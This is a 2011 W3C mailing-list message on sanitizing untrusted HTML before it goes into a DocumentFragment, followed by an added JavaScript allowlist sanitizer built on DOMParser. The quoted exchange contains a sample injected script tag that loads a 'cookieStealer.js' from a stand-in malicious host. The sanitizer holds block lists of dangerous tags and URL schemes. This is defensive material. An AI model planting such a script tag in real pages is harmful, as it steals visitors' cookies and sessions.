- From: Jonas Sicking <jonas@sicking.cc>
- Date: Mon, 7 Nov 2011 20:36:19 -0800
- To: Ryan Seddon <seddon.ryan@gmail.com>
- Cc: Ojan Vafai <ojan@chromium.org>, Yehuda Katz <wycats@gmail.com>, public-webapps WG <public-webapps@w3.org>
On Mon, Nov 7, 2011 at 8:23 PM, Ryan Seddon <seddon.ryan@gmail.com> wrote:
> On Tue, Nov 8, 2011 at 4:30 AM, Ojan Vafai <ojan@chromium.org> wrote:
>>
>> I don't really follow. Script won't execute until you append the fragment
>> to the DOM, at which point the fragment itself doesn't go in the DOM, just
>> its children. So, I'm not really sure what sandboxing on fragments would
>> do.
>
> If I was ajaxing in potentially hostile content that had malicious script
> tags in it, it would be ideal to "sandbox" the content so the HTML parser in
> the browser would strip the content for me.
>
> xhr.responseText = '<div><script src="//malicious.site/cookieStealer.js"></script><h1>content</h1></div>';
>
> var frag = document.createDocumentFragment();
>
> frag.sandbox = "";
> frag.innerHTML = xhr.responseText; // it's sandboxed so the script(s) will be stripped by the parser.
>
> document.body.appendChild(frag);
>
> The following article demonstrates the same concept using an iframe with the
> sandbox attribute set[1]. This to me would also make sense to be extended to
> fragments.
>
> [1]
> http://community.jboss.org/people/wesleyhales/blog/2011/08/28/fixing-ajax-on-mobile-devices

I do think we should add something like this, however I think we should have
a more explicit syntax for it. There's an old thread with subject
"innerStaticHTML" in the WHATWG list which discusses this topic and various
possible syntaxes.

Note that inserting an untrusted piece of HTML into your document is
interesting not just when dealing with document fragments. Both div.innerHTML
as well as div.insertAdjacentHTML(...) seem like they could use "safe"
variants.

In short, I think a separate thread is needed for this :)

/ Jonas
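As an added example (not code from this thread, from any browser, or from the WHATWG proposal it mentions), here is roughly what a page has to do today to get the stripping behaviour the quoted snippet asks the parser for. The untrusted markup is parsed into an inert document with DOMParser, where scripts never run, then reduced to an allowlist of tags and attributes, and only the survivors are copied into a DocumentFragment of the live page. Every name in it (ALLOWED_TAGS, isSafeUrl, sanitizeToFragment, and so on) is this example's own, not a real or proposed DOM API.

```javascript
// Added example, not from the original thread: an allowlist sanitizer that does
// by hand what a "sandboxed fragment" would do in the parser. All identifiers
// here are the example's own, not a real or proposed DOM API.

// Tags kept; every other element is removed. Compared against Element.localName,
// which is lowercase for HTML elements in an HTML document.
const ALLOWED_TAGS = new Set([
  'div', 'p', 'span', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
  'ul', 'ol', 'li', 'strong', 'em', 'b', 'i', 'br', 'a', 'img',
]);

// Tags whose whole subtree is dropped. Any other disallowed tag is unwrapped:
// the element goes away, its (already scrubbed) children stay.
const DROP_WITH_CONTENT = new Set([
  'script', 'style', 'iframe', 'object', 'embed', 'noscript', 'template',
  'svg', 'math', 'form', 'base', 'link', 'meta',
]);

// Per-tag attribute allowlist; '*' applies to every allowed tag.
const ALLOWED_ATTRS = {
  '*': new Set(['title', 'class']),
  a: new Set(['href']),
  img: new Set(['src', 'alt']),
};

// Attributes that carry a URL also need a scheme check, not just a name check.
const URL_ATTRS = new Set(['href', 'src']);

// Accept relative URLs and a short list of schemes. Browsers ignore tabs,
// newlines and leading controls inside a URL, so those are stripped first;
// "java\nscript:" therefore fails like plain "javascript:" does.
function isSafeUrl(value) {
  const cleaned = value.replace(/[\u0000-\u0020]/g, '').toLowerCase();
  const colon = cleaned.indexOf(':');
  if (colon === -1) return true;                   // no scheme: relative URL
  const slash = cleaned.indexOf('/');
  if (slash !== -1 && slash < colon) return true;  // "/a:b" is a path, not a scheme
  const scheme = cleaned.slice(0, colon);
  return scheme === 'http' || scheme === 'https' || scheme === 'mailto';
}

// Event handlers (on*) are never kept; other attributes must be allowlisted
// for the tag, and URL-bearing ones must also pass isSafeUrl.
function isAllowedAttr(tag, name, value) {
  const lower = name.toLowerCase();
  if (lower.startsWith('on')) return false;
  const allowed = ALLOWED_ATTRS['*'].has(lower) ||
    (ALLOWED_ATTRS[tag] !== undefined && ALLOWED_ATTRS[tag].has(lower));
  if (!allowed) return false;
  return URL_ATTRS.has(lower) ? isSafeUrl(value) : true;
}

// Scrub the children of one element in place. The child list is snapshotted
// with Array.from because the loop removes and re-parents nodes.
function scrubElement(el) {
  for (const child of Array.from(el.childNodes)) {
    if (child.nodeType === 8) {           // Node.COMMENT_NODE: drop comments
      child.remove();
      continue;
    }
    if (child.nodeType !== 1) continue;   // text nodes are inert; keep them
    const tag = child.localName;
    if (DROP_WITH_CONTENT.has(tag)) {     // script, style, iframe, ...: drop subtree
      child.remove();
      continue;
    }
    if (!ALLOWED_TAGS.has(tag)) {         // unknown tag: scrub, then unwrap
      scrubElement(child);
      while (child.firstChild) el.insertBefore(child.firstChild, child);
      child.remove();
      continue;
    }
    for (const attr of Array.from(child.attributes)) {
      if (!isAllowedAttr(tag, attr.name, attr.value)) child.removeAttribute(attr.name);
    }
    scrubElement(child);
  }
}

// Parse untrusted markup into an inert document (DOMParser output has no
// browsing context and never executes script), scrub it, and copy the
// survivors into a DocumentFragment owned by the live document. The caller
// appends that fragment exactly as the thread's snippet does.
function sanitizeToFragment(untrustedHtml, targetDocument = document) {
  const inert = new DOMParser().parseFromString(untrustedHtml, 'text/html');
  scrubElement(inert.body);
  const frag = targetDocument.createDocumentFragment();
  for (const node of Array.from(inert.body.childNodes)) {
    frag.appendChild(targetDocument.importNode(node, true));
  }
  return frag;
}

// Browser usage, with the thread's own hostile payload as input:
//   var frag = sanitizeToFragment('<div><script src="//malicious.site/cookieStealer.js"></script><h1>content</h1></div>');
//   document.body.appendChild(frag);   // inserts <div><h1>content</h1></div>; the script element is gone
```

The ordering matters: attributes are checked while the markup is still in the inert document, because an `img` with a hostile `src` does nothing there but would start a request the moment it is imported into the live document. The same function works for the `div.innerHTML` and `div.insertAdjacentHTML(...)` cases Jonas mentions, since the caller can append the returned fragment anywhere.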
Received on Tuesday, 8 November 2011 04:37:27 UTC